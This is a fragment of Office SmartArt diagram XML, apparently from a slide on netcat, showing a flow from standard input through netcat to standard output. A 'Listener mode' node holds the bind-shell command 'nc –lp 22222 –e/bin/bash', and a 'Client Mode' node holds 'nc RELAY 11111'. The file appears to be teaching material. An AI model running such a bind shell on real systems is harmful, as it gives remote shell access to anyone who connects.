        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{64698B91-0928-024C-AE05-88EE33E4060A}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{367F1DF9-0799-ED49-A737-87B6D9CC7AFE}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{6CF6FFC6-D05A-C44A-83E1-DBD0DD08472C}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{ED5BE149-D6A3-8248-9FF8-7F155629FF30}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{ADFFF3BE-34D5-B243-8B65-FF222B5EA051}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{FF5D8D2E-463A-E64B-B9FE-6F3C013FCF82}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E7BC8B4A-130A-9A4C-A9A2-322AF6D59C78}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{BBDC703A-C6F3-0242-BA68-C7752B40F20F}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{867B636A-D42E-F04A-A56B-7A53D1F1A54C}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{7F3BEBED-0F54-F54E-944D-488B3635DFF6}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8F3F7175-F299-8C40-80B3-6D2CE5A9E8D5}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9C8D2B9A-6403-6943-81DF-21B03F41FFF6}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2B9AF70A-ADE1-944C-9988-36F7AA53F122}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{026B3442-7787-F342-9F4F-B8FBB07C60F0}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{23E93F63-BC7C-834C-B964-61EC45D6DA45}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1622F9C2-26A8-574C-8E9A-744DEF3372A8}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{D6C46F79-F526-6A40-B9C5-0DD29566127F}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{FD058BB3-B033-634B-B2E7-D4A1DBE569A2}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{211CBF23-3321-904F-BEC8-0BA2BD3CDEB3}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{3C39C3BF-6D0D-684D-B447-94CD7C89FEAB}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C852AE8A-3381-C649-B1CF-B042B21CCF9B}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{71CC8551-3570-6A44-B5CB-89EE7C0F6EF8}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6C092CDA-A605-CB44-821E-27417111AFA2}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C3FDE2AD-895D-274E-B9DD-3A430A30C9EA}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ADC731D7-3FC4-A542-86B7-6E974F4A8C42}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{BF27BC0C-E402-4F4F-9E12-9BE0C9278011}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ABA43926-0287-AB4F-A4DB-8D943EDE68AA}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5B7586FB-2E7C-5B48-B30A-A365A5D9BD05}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{A7129F8C-8D43-E544-A62A-3C278A8961FF}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0819EE36-2794-0B40-A27F-4DA6E3556C0D}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
